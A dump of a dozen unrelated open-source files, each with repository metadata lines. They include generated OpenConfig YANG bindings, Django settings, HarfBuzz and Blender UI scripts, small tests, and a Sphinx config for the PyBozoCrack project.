YANG Description: State parameters for the AS external LSA """ if hasattr(v, "_utype"): v = v._utype(v) try: t = YANGDynClass( v, base=state.state, is_container="container", yang_name="state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace="http://openconfig.net/yang/network-instance", defining_module="openconfig-network-instance", yang_type="container", is_config=False, ) except (TypeError, ValueError): raise ValueError( { "error-string": """state must be of a type compatible with container""", "defined-type": "container", "generated-type": """YANGDynClass(base=state.state, is_container='container', yang_name="state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=False)""", } ) self.__state = t if hasattr(self, "_set"): self._set() def _unset_state(self): self.__state = YANGDynClass( base=state.state, is_container="container", yang_name="state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace="http://openconfig.net/yang/network-instance", defining_module="openconfig-network-instance", yang_type="container", is_config=False, ) def _get_types_of_service(self): """ Getter method for types_of_service, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/as_external_lsa/types_of_service (container) YANG Description: Breakdown of External LSA contents specifying multiple TOS values """ return self.__types_of_service def _set_types_of_service(self, v, load=False): """ Setter method for types_of_service, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/as_external_lsa/types_of_service (container) If this variable is read-only (config: false) in the source YANG file, then _set_types_of_service is considered as a private method. Backends looking to populate this variable should do so via calling thisObj._set_types_of_service() directly. 
YANG Description: Breakdown of External LSA contents specifying multiple TOS values """ if hasattr(v, "_utype"): v = v._utype(v) try: t = YANGDynClass( v, base=types_of_service.types_of_service, is_container="container", yang_name="types-of-service", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace="http://openconfig.net/yang/network-instance", defining_module="openconfig-network-instance", yang_type="container", is_config=False, ) except (TypeError, ValueError): raise ValueError( { "error-string": """types_of_service must be of a type compatible with container""", "defined-type": "container", "generated-type": """YANGDynClass(base=types_of_service.types_of_service, is_container='container', yang_name="types-of-service", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=False)""", } ) self.__types_of_service = t if hasattr(self, "_set"): self._set() def _unset_types_of_service(self): self.__types_of_service = YANGDynClass( base=types_of_service.types_of_service, is_container="container", yang_name="types-of-service", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace="http://openconfig.net/yang/network-instance", defining_module="openconfig-network-instance", yang_type="container", is_config=False, ) state = __builtin__.property(_get_state) types_of_service = __builtin__.property(_get_types_of_service) _pyangbind_elements = OrderedDict( [("state", state), ("types_of_service", types_of_service)] )
napalm-automation/napalm-yang
napalm_yang/models/openconfig/network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/as_external_lsa/__init__.py
Python
apache-2.0
19,446
0.001337
class A(B):
    pass

class A(object):
    pass

class A(x.y()):
    pass

class A(B, C):
    pass
warner83/micropython
tests/bytecode/mp-tests/class5.py
Python
mit
96
0.03125
""" WSGI config for eyrie project. It exposes the WSGI callable as a module-level variable named ``application``. For more information on this file, see https://docs.djangoproject.com/en/1.9/howto/deployment/wsgi/ """ import os from django.core.wsgi import get_wsgi_application from whitenoise.django import DjangoWhiteNoise os.environ.setdefault("DJANGO_SETTINGS_MODULE", "eyrie.settings") application = get_wsgi_application() application = DjangoWhiteNoise(application)
ZeroCater/Eyrie
eyrie/wsgi.py
Python
mit
478
0
class Symbol(object):
    def __init__(self, num, name):
        pass
lodevil/pyparser
pyparser/symbol.py
Python
apache-2.0
72
0
# -*- coding: utf-8 -*-
"""Setup/installation tests for this package."""

from ade25.assetmanager.testing import IntegrationTestCase
from plone import api


class TestInstall(IntegrationTestCase):
    """Test installation of ade25.assetmanager into Plone."""

    def setUp(self):
        """Custom shared utility setup for tests."""
        self.portal = self.layer['portal']
        self.installer = api.portal.get_tool('portal_quickinstaller')

    def test_product_installed(self):
        """Test if ade25.assetmanager is installed with portal_quickinstaller."""
        self.assertTrue(self.installer.isProductInstalled('ade25.assetmanager'))

    def test_uninstall(self):
        """Test if ade25.assetmanager is cleanly uninstalled."""
        self.installer.uninstallProducts(['ade25.assetmanager'])
        self.assertFalse(self.installer.isProductInstalled('ade25.assetmanager'))

    # browserlayer.xml
    def test_browserlayer(self):
        """Test that IAde25AssetmanagerLayer is registered."""
        from ade25.assetmanager.interfaces import IAde25AssetmanagerLayer
        from plone.browserlayer import utils
        self.failUnless(IAde25AssetmanagerLayer in utils.registered_layers())
ade25/ade25.assetmanager
ade25/assetmanager/tests/test_setup.py
Python
mit
1,209
0.002481
# Copyright (C) 2017 Kacy Thorne
#
# This file is part of Clontris.
#
# Clontris is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Clontris is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program.  If not, see <http://www.gnu.org/licenses/>.

"""This module contains project metadata.

If using setuptools, then within setup.py put::

    meta = {}
    with open('clontris/meta.py') as f:
        exec(f.read(), meta)

Then access this module's attributes like this::

    version = meta['version']
"""

package_name = 'clontris'
project_name = 'Clontris'
version = '0.1.0-dev'
kcthrn/clontris
clontris/meta.py
Python
gpl-3.0
1,028
0
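The docstring above sketches how setup.py can consume this module; a self-contained version of that pattern might look as follows (the setuptools fields other than name and version are assumptions for illustration):

# Minimal setup.py sketch following the docstring's exec-based pattern above.
from setuptools import setup, find_packages

meta = {}
with open('clontris/meta.py') as f:
    exec(f.read(), meta)

setup(
    name=meta['project_name'],
    version=meta['version'],
    packages=find_packages(),
)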
t = int(raw_input())
MOD = 10**9 + 7

def modexp(a, b):
    res = 1
    while b:
        if b & 1:
            res *= a
            res %= MOD
        a = (a*a) % MOD
        b /= 2
    return res

fn = [1 for _ in xrange(100001)]
ifn = [1 for _ in xrange(100001)]
for i in range(1, 100000):
    fn[i] = fn[i-1] * i
    fn[i] %= MOD
    ifn[i] = modexp(fn[i], MOD-2)

def nCr(n, k):
    return fn[n] * ifn[k] * ifn[n-k]

for ti in range(t):
    n = int(raw_input())
    a = map(int, raw_input().split())
    ans = 0
    for i in range(n):
        if i % 2 == 0:
            ans += nCr(n-1, i) % MOD * a[i] % MOD
        else:
            ans -= nCr(n-1, i) % MOD * a[i] % MOD
        ans %= MOD
    print ans
ManrajGrover/CodeSprint_India_2014
Qualification_Round_2/Editorials/array_simp_2.py
Python
mit
683
0.030747
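The solution above computes, for each test case, the alternating binomial sum sum_i (-1)^i * C(n-1, i) * a[i] modulo 10^9 + 7, using precomputed factorials and modular inverses. A small Python 3 cross-check of that formula (written here for illustration only, not part of the original submission; math.comb needs Python 3.8+):

# Naive re-computation of the alternating binomial sum for a tiny input.
from math import comb

MOD = 10**9 + 7

def alternating_sum(a):
    n = len(a)
    return sum((-1) ** i * comb(n - 1, i) * a[i] for i in range(n)) % MOD

print(alternating_sum([1, 2]))  # 1000000006, i.e. -1 mod 10**9 + 7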
import sys from unicode_parse_common import * # http://www.unicode.org/Public/5.1.0/ucd/Scripts.txt script_to_harfbuzz = { # This is the list of HB_Script_* at the time of writing 'Common': 'HB_Script_Common', 'Greek': 'HB_Script_Greek', 'Cyrillic': 'HB_Script_Cyrillic', 'Armenian': 'HB_Script_Armenian', 'Hebrew': 'HB_Script_Hebrew', 'Arabic': 'HB_Script_Arabic', 'Syriac': 'HB_Script_Syriac', 'Thaana': 'HB_Script_Thaana', 'Devanagari': 'HB_Script_Devanagari', 'Bengali': 'HB_Script_Bengali', 'Gurmukhi': 'HB_Script_Gurmukhi', 'Gujarati': 'HB_Script_Gujarati', 'Oriya': 'HB_Script_Oriya', 'Tamil': 'HB_Script_Tamil', 'Telugu': 'HB_Script_Telugu', 'Kannada': 'HB_Script_Kannada', 'Malayalam': 'HB_Script_Malayalam', 'Sinhala': 'HB_Script_Sinhala', 'Thai': 'HB_Script_Thai', 'Lao': 'HB_Script_Lao', 'Tibetan': 'HB_Script_Tibetan', 'Myanmar': 'HB_Script_Myanmar', 'Georgian': 'HB_Script_Georgian', 'Hangul': 'HB_Script_Hangul', 'Ogham': 'HB_Script_Ogham', 'Runic': 'HB_Script_Runic', 'Khmer': 'HB_Script_Khmer', 'Inherited': 'HB_Script_Inherited', } class ScriptDict(object): def __init__(self, base): self.base = base def __getitem__(self, key): r = self.base.get(key, None) if r is None: return 'HB_Script_Common' return r def main(infile, outfile): ranges = unicode_file_parse(infile, ScriptDict(script_to_harfbuzz), 'HB_Script_Common') ranges = sort_and_merge(ranges) print >>outfile, '// Generated from Unicode script tables\n' print >>outfile, '#ifndef SCRIPT_PROPERTIES_H_' print >>outfile, '#define SCRIPT_PROPERTIES_H_\n' print >>outfile, '#include <stdint.h>' print >>outfile, '#include "harfbuzz-shaper.h"\n' print >>outfile, 'struct script_property {' print >>outfile, ' uint32_t range_start;' print >>outfile, ' uint32_t range_end;' print >>outfile, ' HB_Script script;' print >>outfile, '};\n' print >>outfile, 'static const struct script_property script_properties[] = {' for (start, end, value) in ranges: print >>outfile, ' {0x%x, 0x%x, %s},' % (start, end, value) print >>outfile, '};\n' print >>outfile, 'static const unsigned script_properties_count = %d;\n' % len(ranges) print >>outfile, '#endif // SCRIPT_PROPERTIES_H_' if __name__ == '__main__': if len(sys.argv) != 3: print 'Usage: %s <input .txt> <output .h>' % sys.argv[0] else: main(file(sys.argv[1], 'r'), file(sys.argv[2], 'w+'))
zcbenz/cefode-chromium
third_party/harfbuzz/contrib/tables/scripts-parse.py
Python
bsd-3-clause
2,516
0.010731
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.

# String literals representing core resources.
ADDRESS_GROUP = 'address_group'
AGENT = 'agent'
FLOATING_IP = 'floatingip'
LOCAL_IP_ASSOCIATION = 'local_ip_association'
NETWORK = 'network'
NETWORKS = 'networks'
PORT = 'port'
PORTS = 'ports'
PORT_BINDING = 'port_binding'
PORT_DEVICE = 'port_device'
PROCESS = 'process'
RBAC_POLICY = 'rbac-policy'
ROUTER = 'router'
ROUTER_CONTROLLER = 'router_controller'
ROUTER_GATEWAY = 'router_gateway'
ROUTER_INTERFACE = 'router_interface'
SECURITY_GROUP = 'security_group'
SECURITY_GROUP_RULE = 'security_group_rule'
SEGMENT = 'segment'
SEGMENT_HOST_MAPPING = 'segment_host_mapping'
SUBNET = 'subnet'
SUBNETS = 'subnets'
SUBNETPOOL_ADDRESS_SCOPE = 'subnetpool_address_scope'
SUBPORTS = 'subports'
TRUNK = 'trunk'
TRUNK_PLUGIN = 'trunk_plugin'
openstack/neutron-lib
neutron_lib/callbacks/resources.py
Python
apache-2.0
1,353
0
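These constants are typically consumed through neutron-lib's callback registry; a minimal subscription sketch is shown below (the handler name, its body, and the choice of event are illustrative assumptions, not taken from this file):

# Sketch: subscribing a callback to AFTER_CREATE events for the PORT resource.
from neutron_lib.callbacks import events
from neutron_lib.callbacks import registry
from neutron_lib.callbacks import resources


def log_port_create(resource, event, trigger, payload=None):
    # Invoked after a port resource has been created.
    print("created %s via %s" % (resource, event))


registry.subscribe(log_port_create, resources.PORT, events.AFTER_CREATE)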
from decouple import Csv, config from dj_database_url import parse as db_url from .base import * # noqa DEBUG = False SECRET_KEY = config('SECRET_KEY') DATABASES = { 'default': config('DATABASE_URL', cast=db_url), } DATABASES['default']['ATOMIC_REQUESTS'] = True ALLOWED_HOSTS = config('ALLOWED_HOSTS', cast=Csv()) STATIC_ROOT = 'staticfiles' STATIC_URL = '/static/' MEDIA_ROOT = 'mediafiles' MEDIA_URL = '/media/' SERVER_EMAIL = 'foo@example.com' EMAIL_HOST = 'smtp.sendgrid.net' EMAIL_HOST_USER = config('SENDGRID_USERNAME') EMAIL_HOST_PASSWORD = config('SENDGRID_PASSWORD') EMAIL_PORT = 587 EMAIL_USE_TLS = True # Security SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https') SECURE_SSL_REDIRECT = True SESSION_COOKIE_SECURE = True CSRF_COOKIE_SECURE = True SECURE_HSTS_SECONDS = 3600 SECURE_HSTS_INCLUDE_SUBDOMAINS = True SECURE_CONTENT_TYPE_NOSNIFF = True SECURE_BROWSER_XSS_FILTER = True X_FRAME_OPTIONS = 'DENY' CSRF_COOKIE_HTTPONLY = True # Webpack WEBPACK_LOADER['DEFAULT']['CACHE'] = True # Celery CELERY_BROKER_URL = config('REDIS_URL') CELERY_RESULT_BACKEND = config('REDIS_URL') CELERY_SEND_TASK_ERROR_EMAILS = True # Whitenoise STATICFILES_STORAGE = 'whitenoise.storage.CompressedManifestStaticFilesStorage' MIDDLEWARE.insert( # insert WhiteNoiseMiddleware right after SecurityMiddleware MIDDLEWARE.index('django.middleware.security.SecurityMiddleware') + 1, 'whitenoise.middleware.WhiteNoiseMiddleware') # django-log-request-id MIDDLEWARE.insert( # insert RequestIDMiddleware on the top 0, 'log_request_id.middleware.RequestIDMiddleware') LOG_REQUEST_ID_HEADER = 'HTTP_X_REQUEST_ID' LOG_REQUESTS = True # Opbeat INSTALLED_APPS += ['opbeat.contrib.django'] MIDDLEWARE.insert( # insert OpbeatAPMMiddleware on the top 0, 'opbeat.contrib.django.middleware.OpbeatAPMMiddleware') LOGGING = { 'version': 1, 'disable_existing_loggers': False, 'filters': { 'require_debug_false': { '()': 'django.utils.log.RequireDebugFalse' }, 'request_id': { '()': 'log_request_id.filters.RequestIDFilter' }, }, 'formatters': { 'standard': { 'format': '%(levelname)-8s [%(asctime)s] [%(request_id)s] %(name)s: %(message)s' }, }, 'handlers': { 'null': { 'class': 'logging.NullHandler', }, 'mail_admins': { 'level': 'ERROR', 'class': 'django.utils.log.AdminEmailHandler', 'filters': ['require_debug_false'], }, 'console': { 'level': 'DEBUG', 'class': 'logging.StreamHandler', 'filters': ['request_id'], 'formatter': 'standard', }, }, 'loggers': { '': { 'handlers': ['console'], 'level': 'INFO' }, 'django.security.DisallowedHost': { 'handlers': ['null'], 'propagate': False, }, 'django.request': { 'handlers': ['mail_admins'], 'level': 'ERROR', 'propagate': True, }, 'log_request_id.middleware': { 'handlers': ['console'], 'level': 'DEBUG', 'propagate': False, }, } }
camilaavilarinho/monitorador-twitter
monitortwitter/settings/production.py
Python
mit
3,261
0.000613
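The production settings above pull everything environment-specific through python-decouple's config(); the variables they expect can be supplied via the process environment or a .env file. A hypothetical minimal set with placeholder values (every value here is an assumption for local experimentation only):

# Placeholder values for the variables read via config() in production.py above.
import os

os.environ.setdefault("SECRET_KEY", "dev-only-secret")
os.environ.setdefault("DATABASE_URL", "postgres://user:password@localhost:5432/app")
os.environ.setdefault("ALLOWED_HOSTS", "example.com,www.example.com")
os.environ.setdefault("SENDGRID_USERNAME", "apikey-user")
os.environ.setdefault("SENDGRID_PASSWORD", "apikey-password")
os.environ.setdefault("REDIS_URL", "redis://localhost:6379/0")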
import sys
sys.path.append("..")
from deflate import fix_star_rating

# The beatmap that you are checking and fixing inflated patterns for
beatmap_path = "./necro.osu"

# The new difficulty name (Version) of the beatmap
new_difficulty_name = "star rating fix"

# The output file path of the beatmap
output_path = "./necro_fixed.osu"

fix_star_rating(beatmap_path, new_difficulty_name, output_path)
Swan/ManiaStarReducer
test/example.py
Python
mit
398
0.005025
# ##### BEGIN GPL LICENSE BLOCK ##### # # This program is free software; you can redistribute it and/or # modify it under the terms of the GNU General Public License # as published by the Free Software Foundation; either version 2 # of the License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software Foundation, # Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. # # ##### END GPL LICENSE BLOCK ##### # <pep8 compliant> import bpy from bpy.types import Panel, Menu from rna_prop_ui import PropertyPanel class ArmatureButtonsPanel: bl_space_type = 'PROPERTIES' bl_region_type = 'WINDOW' bl_context = "data" @classmethod def poll(cls, context): return context.armature class DATA_PT_context_arm(ArmatureButtonsPanel, Panel): bl_label = "" bl_options = {'HIDE_HEADER'} def draw(self, context): layout = self.layout ob = context.object arm = context.armature space = context.space_data if ob: layout.template_ID(ob, "data") elif arm: layout.template_ID(space, "pin_id") class DATA_PT_skeleton(ArmatureButtonsPanel, Panel): bl_label = "Skeleton" def draw(self, context): layout = self.layout arm = context.armature layout.prop(arm, "pose_position", expand=True) col = layout.column() col.label(text="Layers:") col.prop(arm, "layers", text="") col.label(text="Protected Layers:") col.prop(arm, "layers_protected", text="") if context.scene.render.engine == 'BLENDER_GAME': col = layout.column() col.label(text="Deform:") col.prop(arm, "deform_method", expand=True) class DATA_PT_display(ArmatureButtonsPanel, Panel): bl_label = "Display" def draw(self, context): layout = self.layout ob = context.object arm = context.armature layout.prop(arm, "draw_type", expand=True) split = layout.split() col = split.column() col.prop(arm, "show_names", text="Names") col.prop(arm, "show_axes", text="Axes") col.prop(arm, "show_bone_custom_shapes", text="Shapes") col = split.column() col.prop(arm, "show_group_colors", text="Colors") if ob: col.prop(ob, "show_x_ray", text="X-Ray") col.prop(arm, "use_deform_delay", text="Delay Refresh") class DATA_PT_bone_group_specials(Menu): bl_label = "Bone Group Specials" def draw(self, context): layout = self.layout layout.operator("pose.group_sort", icon='SORTALPHA') class DATA_PT_bone_groups(ArmatureButtonsPanel, Panel): bl_label = "Bone Groups" @classmethod def poll(cls, context): return (context.object and context.object.type == 'ARMATURE' and context.object.pose) def draw(self, context): layout = self.layout ob = context.object pose = ob.pose group = pose.bone_groups.active row = layout.row() rows = 1 if group: rows = 4 row.template_list("UI_UL_list", "bone_groups", pose, "bone_groups", pose.bone_groups, "active_index", rows=rows) col = row.column(align=True) col.active = (ob.proxy is None) col.operator("pose.group_add", icon='ZOOMIN', text="") col.operator("pose.group_remove", icon='ZOOMOUT', text="") col.menu("DATA_PT_bone_group_specials", icon='DOWNARROW_HLT', text="") if group: col.separator() col.operator("pose.group_move", icon='TRIA_UP', text="").direction = 'UP' col.operator("pose.group_move", icon='TRIA_DOWN', text="").direction = 'DOWN' split = layout.split() split.active = (ob.proxy is None) col = split.column() 
col.prop(group, "color_set") if group.color_set: col = split.column() sub = col.row(align=True) sub.enabled = group.is_custom_color_set # only custom colors are editable sub.prop(group.colors, "normal", text="") sub.prop(group.colors, "select", text="") sub.prop(group.colors, "active", text="") row = layout.row() row.active = (ob.proxy is None) sub = row.row(align=True) sub.operator("pose.group_assign", text="Assign") sub.operator("pose.group_unassign", text="Remove") # row.operator("pose.bone_group_remove_from", text="Remove") sub = row.row(align=True) sub.operator("pose.group_select", text="Select") sub.operator("pose.group_deselect", text="Deselect") class DATA_PT_pose_library(ArmatureButtonsPanel, Panel): bl_label = "Pose Library" bl_options = {'DEFAULT_CLOSED'} @classmethod def poll(cls, context): return (context.object and context.object.type == 'ARMATURE' and context.object.pose) def draw(self, context): layout = self.layout ob = context.object poselib = ob.pose_library layout.template_ID(ob, "pose_library", new="poselib.new", unlink="poselib.unlink") if poselib: # list of poses in pose library row = layout.row() row.template_list("UI_UL_list", "pose_markers", poselib, "pose_markers", poselib.pose_markers, "active_index", rows=3) # column of operators for active pose # - goes beside list col = row.column(align=True) col.active = (poselib.library is None) # invoke should still be used for 'add', as it is needed to allow # add/replace options to be used properly col.operator("poselib.pose_add", icon='ZOOMIN', text="") col.operator_context = 'EXEC_DEFAULT' # exec not invoke, so that menu doesn't need showing pose_marker_active = poselib.pose_markers.active if pose_marker_active is not None: col.operator("poselib.pose_remove", icon='ZOOMOUT', text="") col.operator("poselib.apply_pose", icon='ZOOM_SELECTED', text="").pose_index = poselib.pose_markers.active_index col.operator("poselib.action_sanitize", icon='HELP', text="") # XXX: put in menu? 
# TODO: this panel will soon be deprecated too class DATA_PT_ghost(ArmatureButtonsPanel, Panel): bl_label = "Ghost" def draw(self, context): layout = self.layout arm = context.armature layout.prop(arm, "ghost_type", expand=True) split = layout.split() col = split.column(align=True) if arm.ghost_type == 'RANGE': col.prop(arm, "ghost_frame_start", text="Start") col.prop(arm, "ghost_frame_end", text="End") col.prop(arm, "ghost_size", text="Step") elif arm.ghost_type == 'CURRENT_FRAME': col.prop(arm, "ghost_step", text="Range") col.prop(arm, "ghost_size", text="Step") col = split.column() col.label(text="Display:") col.prop(arm, "show_only_ghost_selected", text="Selected Only") class DATA_PT_iksolver_itasc(ArmatureButtonsPanel, Panel): bl_label = "Inverse Kinematics" bl_options = {'DEFAULT_CLOSED'} @classmethod def poll(cls, context): ob = context.object return (ob and ob.pose) def draw(self, context): layout = self.layout ob = context.object itasc = ob.pose.ik_param layout.prop(ob.pose, "ik_solver") if itasc: layout.prop(itasc, "mode", expand=True) simulation = (itasc.mode == 'SIMULATION') if simulation: layout.label(text="Reiteration:") layout.prop(itasc, "reiteration_method", expand=True) row = layout.row() row.active = not simulation or itasc.reiteration_method != 'NEVER' row.prop(itasc, "precision") row.prop(itasc, "iterations") if simulation: layout.prop(itasc, "use_auto_step") row = layout.row() if itasc.use_auto_step: row.prop(itasc, "step_min", text="Min") row.prop(itasc, "step_max", text="Max") else: row.prop(itasc, "step_count") layout.prop(itasc, "solver") if simulation: layout.prop(itasc, "feedback") layout.prop(itasc, "velocity_max") if itasc.solver == 'DLS': row = layout.row() row.prop(itasc, "damping_max", text="Damp", slider=True) row.prop(itasc, "damping_epsilon", text="Eps", slider=True) from bl_ui.properties_animviz import ( MotionPathButtonsPanel, OnionSkinButtonsPanel, ) class DATA_PT_motion_paths(MotionPathButtonsPanel, Panel): #bl_label = "Bones Motion Paths" bl_context = "data" @classmethod def poll(cls, context): # XXX: include pose-mode check? return (context.object) and (context.armature) def draw(self, context): # layout = self.layout ob = context.object avs = ob.pose.animation_visualization pchan = context.active_pose_bone mpath = pchan.motion_path if pchan else None self.draw_settings(context, avs, mpath, bones=True) class DATA_PT_onion_skinning(OnionSkinButtonsPanel): # , Panel): # inherit from panel when ready #bl_label = "Bones Onion Skinning" bl_context = "data" @classmethod def poll(cls, context): # XXX: include pose-mode check? return (context.object) and (context.armature) def draw(self, context): ob = context.object self.draw_settings(context, ob.pose.animation_visualization, bones=True) class DATA_PT_custom_props_arm(ArmatureButtonsPanel, PropertyPanel, Panel): COMPAT_ENGINES = {'BLENDER_RENDER', 'BLENDER_GAME'} _context_path = "object.data" _property_type = bpy.types.Armature if __name__ == "__main__": # only for live edit. bpy.utils.register_module(__name__)
PLyczkowski/Sticky-Keymap
2.74/scripts/startup/bl_ui/properties_data_armature.py
Python
gpl-2.0
10,538
0.001803
# Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

from ._exceptions import (
    UnificationAmbiguousException,
    UnificationFailedException,
    CanonicalizationFailedException)
from ._strategy import (
    UnificationStrategy,
    UnificationStrategyForCanonicalization,
    TupleExpansion)
from ._unification import unify
from ._canonicalization import canonicalize
google/tmppy
_py2tmp/unification/__init__.py
Python
apache-2.0
920
0
__author__ = 'Dominic Miglar <dominic.miglar@bitmovin.net>'

import unittest

from bitcodin import create_input
from bitcodin import Input
from bitcodin.exceptions import BitcodinBadRequestError
from bitcodin.test.bitcodin_test_case import BitcodinTestCase


class CreateInputIncompleteDataTestCase(BitcodinTestCase):

    def setUp(self):
        super(CreateInputIncompleteDataTestCase, self).setUp()
        self.inputUrl = ''

    def runTest(self):
        input = Input(self.inputUrl)
        with self.assertRaises(BitcodinBadRequestError):
            result = create_input(input)

    def tearDown(self):
        super(CreateInputIncompleteDataTestCase, self).tearDown()


if __name__ == '__main__':
    unittest.main()
bitmovin/bitcodin-python
bitcodin/test/input/testcase_create_input_incomplete_data.py
Python
unlicense
727
0
#!/usr/bin/env python # -*- coding: utf-8 -*- # # complexity documentation build configuration file, created by # sphinx-quickstart on Tue Jul 9 22:26:36 2013. # # This file is execfile()d with the current directory set to its # containing dir. # # Note that not all possible configuration values are present in this # autogenerated file. # # All configuration values have a default; values that are commented out # serve to show the default. import sys import os # If extensions (or modules to document with autodoc) are in another # directory, add these directories to sys.path here. If the directory is # relative to the documentation root, use os.path.abspath to make it # absolute, like shown here. #sys.path.insert(0, os.path.abspath('.')) # Get the project root dir, which is the parent dir of this cwd = os.getcwd() project_root = os.path.dirname(cwd) # Insert the project root dir as the first element in the PYTHONPATH. # This lets us ensure that the source package is imported, and that its # version is used. sys.path.insert(0, project_root) import pybozocrack # -- General configuration --------------------------------------------- # If your documentation needs a minimal Sphinx version, state it here. #needs_sphinx = '1.0' # Add any Sphinx extension module names here, as strings. They can be # extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones. extensions = ['sphinx.ext.autodoc', 'sphinx.ext.viewcode'] # Add any paths that contain templates here, relative to this directory. templates_path = ['_templates'] # The suffix of source filenames. source_suffix = '.rst' # The encoding of source files. #source_encoding = 'utf-8-sig' # The master toctree document. master_doc = 'index' # General information about the project. project = u'PyBozoCrack' copyright = u'2014, Henrique Pereira' # The version info for the project you're documenting, acts as replacement # for |version| and |release|, also used in various other places throughout # the built documents. # # The short X.Y version. version = pybozocrack.__version__ # The full version, including alpha/beta/rc tags. release = pybozocrack.__version__ # The language for content autogenerated by Sphinx. Refer to documentation # for a list of supported languages. #language = None # There are two options for replacing |today|: either, you set today to # some non-false value, then it is used: #today = '' # Else, today_fmt is used as the format for a strftime call. #today_fmt = '%B %d, %Y' # List of patterns, relative to source directory, that match files and # directories to ignore when looking for source files. exclude_patterns = ['_build'] # The reST default role (used for this markup: `text`) to use for all # documents. #default_role = None # If true, '()' will be appended to :func: etc. cross-reference text. #add_function_parentheses = True # If true, the current module name will be prepended to all description # unit titles (such as .. function::). #add_module_names = True # If true, sectionauthor and moduleauthor directives will be shown in the # output. They are ignored by default. #show_authors = False # The name of the Pygments (syntax highlighting) style to use. pygments_style = 'sphinx' # A list of ignored prefixes for module index sorting. #modindex_common_prefix = [] # If true, keep warnings as "system message" paragraphs in the built # documents. #keep_warnings = False # -- Options for HTML output ------------------------------------------- # The theme to use for HTML and HTML Help pages. 
See the documentation for # a list of builtin themes. html_theme = 'default' # Theme options are theme-specific and customize the look and feel of a # theme further. For a list of options available for each theme, see the # documentation. #html_theme_options = {} # Add any paths that contain custom themes here, relative to this directory. #html_theme_path = [] # The name for this set of Sphinx documents. If None, it defaults to # "<project> v<release> documentation". #html_title = None # A shorter title for the navigation bar. Default is the same as # html_title. #html_short_title = None # The name of an image file (relative to this directory) to place at the # top of the sidebar. #html_logo = None # The name of an image file (within the static path) to use as favicon # of the docs. This file should be a Windows icon file (.ico) being # 16x16 or 32x32 pixels large. #html_favicon = None # Add any paths that contain custom static files (such as style sheets) # here, relative to this directory. They are copied after the builtin # static files, so a file named "default.css" will overwrite the builtin # "default.css". html_static_path = ['_static'] # If not '', a 'Last updated on:' timestamp is inserted at every page # bottom, using the given strftime format. #html_last_updated_fmt = '%b %d, %Y' # If true, SmartyPants will be used to convert quotes and dashes to # typographically correct entities. #html_use_smartypants = True # Custom sidebar templates, maps document names to template names. #html_sidebars = {} # Additional templates that should be rendered to pages, maps page names # to template names. #html_additional_pages = {} # If false, no module index is generated. #html_domain_indices = True # If false, no index is generated. #html_use_index = True # If true, the index is split into individual pages for each letter. #html_split_index = False # If true, links to the reST sources are added to the pages. #html_show_sourcelink = True # If true, "Created using Sphinx" is shown in the HTML footer. # Default is True. #html_show_sphinx = True # If true, "(C) Copyright ..." is shown in the HTML footer. # Default is True. #html_show_copyright = True # If true, an OpenSearch description file will be output, and all pages # will contain a <link> tag referring to it. The value of this option # must be the base URL from which the finished HTML is served. #html_use_opensearch = '' # This is the file name suffix for HTML files (e.g. ".xhtml"). #html_file_suffix = None # Output file base name for HTML help builder. htmlhelp_basename = 'pybozocrackdoc' # -- Options for LaTeX output ------------------------------------------ latex_elements = { # The paper size ('letterpaper' or 'a4paper'). #'papersize': 'letterpaper', # The font size ('10pt', '11pt' or '12pt'). #'pointsize': '10pt', # Additional stuff for the LaTeX preamble. #'preamble': '', } # Grouping the document tree into LaTeX files. List of tuples # (source start file, target name, title, author, documentclass # [howto/manual]). latex_documents = [ ('index', 'pybozocrack.tex', u'PyBozoCrack Documentation', u'Henrique Pereira', 'manual'), ] # The name of an image file (relative to this directory) to place at # the top of the title page. #latex_logo = None # For "manual" documents, if this is true, then toplevel headings # are parts, not chapters. #latex_use_parts = False # If true, show page references after internal links. #latex_show_pagerefs = False # If true, show URL addresses after external links. 
